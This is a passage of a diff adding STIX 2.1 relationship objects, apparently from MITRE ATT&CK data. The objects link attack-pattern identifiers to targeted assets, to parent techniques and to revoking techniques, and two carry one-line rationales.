"x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fd31c763-8e36-4f6f-9238-fed081b524b3", + "created": "2020-02-11T18:24:04.818Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--51dea151-0898-4a45-967c-3ebee0420484", + "target_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fd34a972-0b7e-4ac2-ba5b-c1ffb0d9ff7d", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b46a801b-fd98-491c-a25a-bca25d6e3001", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fd375cf3-8695-4a45-ac30-efc239e19e4d", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fd3ba994-75a3-4b1e-bfea-8e36b9a07015", + "created": "2020-03-02T14:30:49.811Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--ca205a36-c1ad-488b-aa6c-ab34bdd3a36b", + "target_ref": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fd3bc308-82cd-49c9-a41e-9b19ce04b3cd", + "created": "2023-10-02T20:23:41.227Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-10-02T20:23:41.227Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fd44a14f-1ca5-4356-a6fe-c5507a77d490", + "created": "2020-10-19T13:40:11.238Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1", + "target_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fd498c11-2b76-45fb-9d61-d7051a6469fc", + "created": "2024-06-27T08:53:37.614Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T08:53:37.614Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fd6bf9df-13e5-4864-a5ee-5703b660b361", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4933e63b-9b77-476e-ab29-761bc5b7d15a", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fd7ca8e8-82fc-443d-945a-fcef3352ec8a", + "created": "2020-02-11T18:47:46.705Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--19bf235b-8620-4997-b5b4-94e0659ed7c3", + "target_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fd89cfaa-c5d5-416f-affb-6c1f68e63dd5", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--954a1639-f2d6-407d-aef3-4917622ca493", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fd8aff13-4514-48ad-9663-df65d7fb2b29", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fdae82cc-ec31-4590-8d13-19e6cc2f2946", + "created": "2024-06-26T14:23:50.428Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:23:50.428Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fdb054f1-0446-4af0-b11c-790fbf352014", + "created": "2020-02-05T20:10:18.912Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--2169ba87-1146-4fc7-a118-12b72251db7e", + "target_ref": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fdc20415-c9a1-405e-80af-3d297894e8fa", + "created": "2023-09-28T19:58:30.849Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:58:30.849Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fdd2bb3a-f6bb-48b1-bb6b-78ac329eddcf", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fde1057f-e72f-4c19-a8c4-20378233b5e9", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fdf1ffae-adfd-4140-82c2-2f982b0c43af", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--438c967d-3996-4870-bfc2-3954752a1927", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fe01d6f6-236d-4f2a-8601-36204c8b89f4", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2db31dcd-54da-405d-acef-b9129b816ed6", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fe061ca4-3182-49b7-a70c-96c58e19d9bc", + "created": "2020-02-11T18:46:56.347Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4", + "target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fe22f626-ddf3-4d5e-97d1-058878d7830f", + "created": "2023-09-28T21:10:39.025Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:10:39.025Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fe265dd7-2c1a-4c75-8aa8-12d0c82c7926", + "created": "2023-09-28T21:26:59.998Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:26:59.998Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fe30d6f7-f03d-4af2-a9da-ac1f422a100e", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fe538c59-703a-4e04-8bde-64d192db8bdd", + "created": "2024-05-22T17:08:07.007Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T03:42:15.910Z", + "description": "Asset Mapping Rationale: Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines.", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea071aa0-8f17-416f-ab0d-2bab7e79003d", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fe81b980-bfcd-4baa-a2ff-196327f2ac58", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fe8358f5-ead6-4ae7-a88c-831dda8ab123", + "created": "2020-01-24T19:36:42.015Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "target_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fe9d5067-d307-4e9e-98b7-c08b33645983", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--356662f7-e315-4759-86c9-6214e2a50ff8", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--feaa845f-b860-45ab-beaf-e92bcca92876", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e0033c16-a07e-48aa-8204-7c3ca669998c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--feb5c75b-6c19-48fa-aa49-f2796ae96905", + "created": "2024-05-22T17:09:44.508Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T03:40:57.156Z", + "description": "Asset Mapping Rationale: Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. ", + "relationship_type": "targets", + "source_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--febaa044-5467-4393-bd13-2d096be02cf4", + "created": "2020-03-02T20:07:18.718Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", + "target_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--febc1930-94af-46c3-8633-28f896555ff0", + "created": "2024-06-21T14:12:20.266Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--feccce31-b855-430b-a0f6-6e3a3eb41bf9", + "created": "2020-10-01T02:06:11.541Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--7807d3a4-a885-4639-a786-c1ed41484970", + "target_ref": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fed4bc60-8a26-4c21-a913-63144eb991da", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--feef9475-6694-4cbe-84b2-43c6a8e6257d", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fef113c8-f287-4176-b21c-6c153b715b29", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ff021e27-63be-41f4-bc4d-2ce75d8a3ecb", + "created": "2023-09-28T19:56:26.241Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:56:26.241Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ff0d8860-9790-4a15-93c7-17f01d63b2ad", + "created": "2019-12-19T19:43:34.933Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada", + "target_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ff107632-751b-4efb-86bd-af670b48d35d", + "created": "2023-09-28T21:21:30.387Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:21:30.387Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ff11787d-6290-454a-9caf-9288de6c01f0", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": 